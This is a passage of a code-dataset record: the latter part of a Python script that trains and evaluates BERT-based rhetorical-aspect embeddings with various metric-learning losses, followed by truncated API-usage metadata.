logging.ERROR)\n if accelerator.is_local_main_process:\n datasets.utils.logging.set_verbosity_warning()\n transformers.utils.logging.set_verbosity_info()\n else:\n datasets.utils.logging.set_verbosity_error()\n transformers.utils.logging.set_verbosity_error()\n\n # If passed along, set the training seed now.\n if args.seed is not None:\n set_seed(args.seed)\n\n # Handle the repository creation\n if accelerator.is_main_process:\n if args.output_dir is not None:\n os.makedirs(args.output_dir)\n accelerator.wait_for_everyone()\n\n # Loading the dataset from local csv or json file.\n data_files = {}\n if args.train_file is not None:\n data_files[\"train\"] = args.train_file\n if args.validation_file is not None:\n data_files[\"validation\"] = args.validation_file\n\n raw_datasets = load_dataset('json', data_files=data_files)\n\n # A useful fast method:\n # https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique\n if args.label_num is not None:\n label_list = [f\"{i:02}\" for i in range(1, args.label_num+1)]\n else:\n label_list = raw_datasets[\"train\"].unique(\"label\") + raw_datasets[\"validation\"].unique(\"label\")\n label_list = list(set(label_list))\n label_list.sort() # Let's sort it for determinism\n num_labels = len(label_list)\n\n ngram_list = raw_datasets[\"train\"].unique(\"ngram\") + raw_datasets[\"validation\"].unique(\"ngram\")\n\n # Load pretrained model and tokenizer\n #\n # In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently\n # download model & vocab.\n tokenizer = AutoTokenizer.from_pretrained(args.model_name_or_path, use_fast=not args.use_slow_tokenizer)\n\n sentence_key = \"text\"\n\n label_to_id = {v: i for i, v in enumerate(label_list)}\n ngram_to_id = {v: i for i, v in enumerate(ngram_list)}\n\n padding = \"max_length\" if args.pad_to_max_length else False\n\n def preprocess_function(examples):\n # Tokenize the texts\n texts = (\n (examples[sentence_key],)\n )\n result = tokenizer(*texts, padding=padding, max_length=args.max_length, truncation=True)\n\n if \"label\" in examples:\n if label_to_id is not None:\n # Map labels to IDs (not necessary for GLUE tasks)\n result[\"labels\"] = [label_to_id[l] for l in examples[\"label\"]]\n else:\n # In all cases, rename the column to labels because the model will expect that.\n result[\"labels\"] = examples[\"label\"]\n\n result[\"ngram_ids\"] = [ngram_to_id[l] for l in examples[\"ngram\"]]\n return result\n\n with accelerator.main_process_first():\n processed_datasets = raw_datasets.map(\n preprocess_function,\n batched=True,\n remove_columns=raw_datasets[\"train\"].column_names,\n desc=\"Running tokenizer on dataset\",\n )\n\n train_dataset = processed_datasets[\"train\"]\n eval_dataset = processed_datasets[\"validation\"]\n\n # Log a few random samples from the training set:\n for index in random.sample(range(len(train_dataset)), 3):\n logger.info(f\"Sample {index} of the training set: {train_dataset[index]}.\")\n\n # DataLoaders creation:\n if args.pad_to_max_length:\n # If padding was already done ot max length, we use the default data collator that will just convert everything\n # to tensors.\n data_collator = default_data_collator\n else:\n # Otherwise, `DataCollatorWithPadding` will apply dynamic padding for us (by padding to the maximum length of\n # the samples passed). When using mixed precision, we add `pad_to_multiple_of=8` to pad all tensors to multiple\n # of 8s, which will enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta).\n data_collator = DataCollatorWithPadding(tokenizer, pad_to_multiple_of=(8 if accelerator.use_fp16 else None))\n\n # Classification loss or embedding loss\n if args.loss_type in [\"softmax\", \"arcface\"]:\n model, _ = choose_loss(args, num_labels)\n else:\n model, loss_model = choose_loss(args, num_labels)\n\n\n train_sampler = None\n eval_sampler = None\n if args.m_per_class_sampler:\n train_sampler = MPerClassSampler(\n train_dataset[\"labels\"], \n args.sample_per_class_in_train_batch,\n batch_size=args.per_device_train_batch_size,\n length_before_new_iter=len(train_dataset[\"labels\"])\n )\n eval_sampler = MPerClassSampler(\n eval_dataset[\"labels\"], \n args.sample_per_class_in_eval_batch,\n batch_size=args.per_device_eval_batch_size,\n length_before_new_iter=len(eval_dataset[\"labels\"])\n )\n if args.m_per_class_sampler_without_easy_positives:\n train_sampler = MPerClassSamplerWithoutEasyPostives(\n train_dataset[\"labels\"],\n train_dataset[\"ngram_ids\"], \n args.sample_per_class_in_train_batch,\n batch_size=args.per_device_train_batch_size,\n length_before_new_iter=len(train_dataset[\"labels\"])\n )\n eval_sampler = MPerClassSamplerWithoutEasyPostives(\n eval_dataset[\"labels\"],\n eval_dataset[\"ngram_ids\"],\n args.sample_per_class_in_eval_batch,\n batch_size=args.per_device_eval_batch_size,\n length_before_new_iter=len(eval_dataset[\"labels\"])\n )\n train_dataloader = DataLoader(\n train_dataset, \n shuffle=(train_sampler is None),\n sampler=train_sampler, \n collate_fn=data_collator, \n batch_size=args.per_device_train_batch_size,\n drop_last=True\n )\n eval_dataloader = DataLoader(\n eval_dataset, \n shuffle=(eval_sampler is None),\n sampler=eval_sampler, \n collate_fn=data_collator, \n batch_size=args.per_device_eval_batch_size,\n drop_last=True\n )\n\n # Optimizer\n # Split weights in two groups, one with weight decay and the other not.\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate)\n\n # Prepare everything with our `accelerator`.\n model, optimizer, train_dataloader, eval_dataloader = accelerator.prepare(\n model, optimizer, train_dataloader, eval_dataloader\n )\n\n # Note -> the training dataloader needs to be prepared before we grab his length below (cause its length will be\n # shorter in multiprocess)\n\n # Scheduler and math around the number of training steps.\n num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps)\n\n args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch\n\n lr_scheduler = get_scheduler(\n name=args.lr_scheduler_type,\n optimizer=optimizer,\n num_warmup_steps=args.num_warmup_steps,\n num_training_steps=args.max_train_steps,\n )\n\n accuracy_calculator = AccuracyCalculator(k=\"max_bin_count\", include=(\"precision_at_1\", \"r_precision\", \"mean_average_precision_at_r\"))\n\n # Train!\n total_batch_size = args.per_device_train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps\n\n logger.info(\"***** Running training *****\")\n logger.info(f\" Num examples = {len(train_dataset)}\")\n logger.info(f\" Num Epochs = {args.num_train_epochs}\")\n logger.info(f\" Instantaneous batch size per device = {args.per_device_train_batch_size}\")\n logger.info(f\" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}\")\n logger.info(f\" Gradient Accumulation steps = {args.gradient_accumulation_steps}\")\n logger.info(f\" Total optimization steps = {args.max_train_steps}\")\n\n\n model.eval()\n\n embeddings = []\n labels = []\n\n for step, batch in enumerate(tqdm(eval_dataloader)):\n if step < 5:\n logger.info(f\"[labels in eval batch {step}]\")\n logger.info(batch[\"labels\"])\n logger.info(f\"[ngram_ids in eval batch {step}]\")\n logger.info(batch[\"ngram_ids\"])\n\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n results_txt = \"\"\n current_record = 0\n current_record_epoch_or_step = -1\n logger.info(f\"epoch -1 (before training): {eval_metric}\")\n results_txt += f\"epoch -1 (before training): {eval_metric}\\n\"\n\n\n progress_bar = tqdm(range(args.max_train_steps), disable=not accelerator.is_local_main_process)\n completed_steps = 0\n\n for epoch in range(args.num_train_epochs):\n model.train()\n\n for step, batch in enumerate(train_dataloader):\n if epoch == 0 and step < 5:\n logger.info(f\"[labels in train batch {step}]\")\n logger.info(batch[\"labels\"])\n logger.info(f\"[ngram_ids in train batch {step}]\")\n logger.info(batch[\"ngram_ids\"])\n\n batch.pop(\"ngram_ids\")\n\n if args.loss_type in [\"softmax\", \"arcface\"]:\n outputs = model(**batch)\n loss = outputs.loss\n\n else:\n outputs = model(**batch)\n embeddings_in_batch = outputs.embeddings\n labels_in_batch = batch[\"labels\"]\n\n loss = loss_model(embeddings_in_batch, labels_in_batch)\n\n loss = loss / args.gradient_accumulation_steps\n accelerator.backward(loss)\n\n if step % args.gradient_accumulation_steps == 0 or step == len(train_dataloader) - 1:\n optimizer.step()\n lr_scheduler.step()\n optimizer.zero_grad()\n progress_bar.update(1)\n completed_steps += 1\n\n if completed_steps >= args.max_train_steps:\n break\n\n \n if args.eval_steps is not None and completed_steps % args.eval_steps == 0:\n embeddings = []\n labels = []\n\n model.eval()\n for step, batch in enumerate(eval_dataloader):\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n\n logger.info(f\"step {completed_steps}: {eval_metric}\")\n results_txt += f\"step {completed_steps}: {eval_metric}\\n\"\n\n # save model if it achieves new record\n if eval_metric[\"mean_average_precision_at_r\"] > current_record:\n accelerator.wait_for_everyone()\n unwrapped_model = accelerator.unwrap_model(model)\n accelerator.save(unwrapped_model.state_dict(), os.path.join(args.output_dir, f\"pytorch_model_step{completed_steps}.bin\"))\n current_record = eval_metric[\"mean_average_precision_at_r\"]\n current_record_epoch_or_step = completed_steps\n\n\n if args.eval_steps is not None:\n continue\n\n embeddings = []\n labels = []\n\n model.eval()\n for step, batch in enumerate(eval_dataloader):\n batch.pop(\"ngram_ids\")\n outputs = model(**batch)\n\n # In evaluation, embeddings are L2 normalized\n normalized_embeddings = F.normalize(outputs.embeddings, p=2, dim=1)\n embeddings.append(accelerator.gather(normalized_embeddings).detach().cpu().numpy())\n labels.append(accelerator.gather(batch[\"labels\"]).detach().cpu().numpy())\n\n embeddings = np.concatenate(embeddings)\n labels = np.concatenate(labels)\n embeddings = embeddings[:len(eval_dataloader.dataset)]\n labels = labels[:len(eval_dataloader.dataset)]\n\n eval_metric = accuracy_calculator.get_accuracy(embeddings, embeddings, labels, labels, True)\n\n\n logger.info(f\"epoch {epoch}: {eval_metric}\")\n results_txt += f\"epoch {epoch}: {eval_metric}\\n\"\n\n # save model if it achieves new record\n if eval_metric[\"mean_average_precision_at_r\"] > current_record:\n accelerator.wait_for_everyone()\n unwrapped_model = accelerator.unwrap_model(model)\n accelerator.save(unwrapped_model.state_dict(), os.path.join(args.output_dir, f\"pytorch_model_epoch{epoch}.bin\"))\n current_record = eval_metric[\"mean_average_precision_at_r\"]\n current_record_epoch_or_step = epoch\n\n\n if args.output_dir is not None:\n if args.eval_steps is not None:\n shutil.copyfile(\n os.path.join(args.output_dir, f\"pytorch_model_step{current_record_epoch_or_step}.bin\"), \n os.path.join(args.output_dir, f\"pytorch_model.bin\")\n )\n results_txt += f\"best step: {current_record_epoch_or_step}\\n\"\n\n # delete temporary models\n for step in range(args.max_train_steps):\n target_file = os.path.join(args.output_dir, f\"pytorch_model_step{step}.bin\")\n if os.path.isfile(target_file):\n os.remove(target_file)\n\n else:\n shutil.copyfile(\n os.path.join(args.output_dir, f\"pytorch_model_epoch{current_record_epoch_or_step}.bin\"), \n os.path.join(args.output_dir, f\"pytorch_model.bin\")\n )\n results_txt += f\"best epoch: {current_record_epoch_or_step}\\n\"\n\n # delete temporary models\n for epoch in range(args.num_train_epochs):\n target_file = os.path.join(args.output_dir, f\"pytorch_model_epoch{epoch}.bin\")\n if os.path.isfile(target_file):\n os.remove(target_file)\n\n if accelerator.is_main_process:\n unwrapped_model.config.save_pretrained(args.output_dir)\n tokenizer.save_pretrained(args.output_dir)\n\n with open(os.path.join(args.output_dir, \"results.txt\"), \"w\", encoding=\"utf-8\") as f:\n f.write(results_txt)\n\n\nif __name__ == \"__main__\":\n args = args.parse_args()\n main(args)", "repo_name": "kaisugi/rhetorical_aspect_embeddings", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 18516, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "modules.args.loss_type", "line_number": 44, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 44, "usage_type": "name"}, {"api_name": "modules.models.BertClsSoftmaxCrossEntropyLoss", "line_number": 45, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 46, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 46, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 50, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 50, "usage_type": "name"}, {"api_name": "modules.models.BertClsArcFaceLoss", "line_number": 51, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 52, "usage_type": "name"}, {"api_name": "modules.args.margin", "line_number": 54, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 54, "usage_type": "name"}, {"api_name": "modules.args.scale", "line_number": 55, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 55, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 58, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 58, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 59, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 60, "usage_type": "name"}, {"api_name": "modules.models.TripletMarginLoss", "line_number": 62, "usage_type": "call"}, {"api_name": "modules.args.margin", "line_number": 63, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 63, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 67, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 68, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 69, "usage_type": "name"}, {"api_name": "modules.models.MultiSimilarityLoss", "line_number": 71, "usage_type": "call"}, {"api_name": "modules.args.alpha", "line_number": 72, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 72, "usage_type": "name"}, {"api_name": "modules.args.beta", "line_number": 73, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 73, "usage_type": "name"}, {"api_name": "modules.args.base", "line_number": 74, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 74, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 77, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 77, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 78, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 79, "usage_type": "name"}, {"api_name": "modules.models.NTXentLoss", "line_number": 81, "usage_type": "call"}, {"api_name": "modules.args.temperature", "line_number": 82, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 82, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 86, "usage_type": "call"}, {"api_name": "accelerate.Accelerator", "line_number": 92, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 94, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 97, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 103, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 103, "usage_type": "attribute"}, {"api_name": "datasets.utils.logging.set_verbosity_warning", "line_number": 105, "usage_type": "call"}, {"api_name": "datasets.utils", "line_number": 105, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.set_verbosity_info", "line_number": 106, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 106, "usage_type": "attribute"}, {"api_name": "datasets.utils.logging.set_verbosity_error", "line_number": 108, "usage_type": "call"}, {"api_name": "datasets.utils", "line_number": 108, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.set_verbosity_error", "line_number": 109, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 109, "usage_type": "attribute"}, {"api_name": "modules.args.seed", "line_number": 112, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 112, "usage_type": "name"}, {"api_name": "transformers.set_seed", "line_number": 113, "usage_type": "call"}, {"api_name": "modules.args.seed", "line_number": 113, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 113, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 117, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 117, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 118, "usage_type": "call"}, {"api_name": "modules.args.output_dir", "line_number": 118, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 118, "usage_type": "name"}, {"api_name": "modules.args.train_file", "line_number": 123, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 123, "usage_type": "name"}, {"api_name": "modules.args.train_file", "line_number": 124, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 124, "usage_type": "name"}, {"api_name": "modules.args.validation_file", "line_number": 125, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 125, "usage_type": "name"}, {"api_name": "modules.args.validation_file", "line_number": 126, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 126, "usage_type": "name"}, {"api_name": "datasets.load_dataset", "line_number": 128, "usage_type": "call"}, {"api_name": "modules.args.label_num", "line_number": 132, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 132, "usage_type": "name"}, {"api_name": "modules.args.label_num", "line_number": 133, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 133, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 146, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 146, "usage_type": "name"}, {"api_name": "modules.args.model_name_or_path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 146, "usage_type": "name"}, {"api_name": "modules.args.use_slow_tokenizer", "line_number": 146, "usage_type": "attribute"}, {"api_name": "modules.args.pad_to_max_length", "line_number": 153, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 153, "usage_type": "name"}, {"api_name": "modules.args.max_length", "line_number": 160, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 160, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 185, "usage_type": "call"}, {"api_name": "modules.args.pad_to_max_length", "line_number": 189, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 189, "usage_type": "name"}, {"api_name": "transformers.default_data_collator", "line_number": 192, "usage_type": "name"}, {"api_name": "transformers.DataCollatorWithPadding", "line_number": 197, "usage_type": "call"}, {"api_name": "modules.args.loss_type", "line_number": 200, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 200, "usage_type": "name"}, {"api_name": "modules.args", "line_number": 201, "usage_type": "argument"}, {"api_name": "modules.args", "line_number": 203, "usage_type": "argument"}, {"api_name": "modules.args.m_per_class_sampler", "line_number": 208, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 208, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSampler", "line_number": 209, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_train_batch", "line_number": 211, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 211, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 212, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 212, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSampler", "line_number": 215, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_eval_batch", "line_number": 217, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 217, "usage_type": "name"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 218, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 218, "usage_type": "name"}, {"api_name": "modules.args.m_per_class_sampler_without_easy_positives", "line_number": 221, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 221, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSamplerWithoutEasyPostives", "line_number": 222, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_train_batch", "line_number": 225, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 225, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 226, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 226, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSamplerWithoutEasyPostives", "line_number": 229, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_eval_batch", "line_number": 232, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 232, "usage_type": "name"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 233, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 233, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 236, "usage_type": "call"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 241, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 241, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 244, "usage_type": "call"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 249, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 249, "usage_type": "name"}, {"api_name": "modules.args.weight_decay", "line_number": 259, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 259, "usage_type": "name"}, {"api_name": "transformers.AdamW", "line_number": 266, "usage_type": "call"}, {"api_name": "modules.args.learning_rate", "line_number": 266, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 266, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 277, "usage_type": "call"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 277, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 277, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 279, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 279, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 279, "usage_type": "attribute"}, {"api_name": "transformers.get_scheduler", "line_number": 281, "usage_type": "call"}, {"api_name": "modules.args.lr_scheduler_type", "line_number": 282, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 282, "usage_type": "name"}, {"api_name": "modules.args.num_warmup_steps", "line_number": 284, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 284, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 285, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 285, "usage_type": "name"}, {"api_name": "modules.utils.AccuracyCalculator", "line_number": 288, "usage_type": "call"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 291, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 291, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 291, "usage_type": "attribute"}, {"api_name": "modules.args.num_train_epochs", "line_number": 295, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 295, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 296, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 296, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 298, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 298, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 299, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 299, "usage_type": "name"}, {"api_name": "tqdm.auto.tqdm", "line_number": 307, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 318, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 318, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 323, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 336, "usage_type": "call"}, {"api_name": "modules.args.max_train_steps", "line_number": 336, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 336, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 339, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 339, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 351, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 351, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 362, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 362, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 365, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 365, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 372, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 372, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 376, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 376, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 386, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 386, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 391, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path", "line_number": 405, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 405, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 405, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 410, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 410, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 422, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 422, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 426, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 427, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 441, "usage_type": "call"}, {"api_name": "os.path", "line_number": 441, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 441, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 441, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 446, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 446, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 447, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 447, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 448, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 449, "usage_type": "call"}, {"api_name": "os.path", "line_number": 449, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 449, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 449, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 450, "usage_type": "call"}, {"api_name": "os.path", "line_number": 450, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 450, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 450, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 455, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 455, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 456, "usage_type": "call"}, {"api_name": "os.path", "line_number": 456, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 456, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 456, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 458, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 461, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 462, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 462, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 462, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 463, "usage_type": "call"}, {"api_name": "os.path", "line_number": 463, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 463, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 463, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 468, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 468, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 469, "usage_type": "call"}, {"api_name": "os.path", "line_number": 469, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 469, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 469, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 470, "usage_type": "call"}, {"api_name": "os.path", "line_number": 470, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 471, "usage_type": "call"}, {"api_name": "modules.args.output_dir", "line_number": 474, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 474, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 475, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 475, 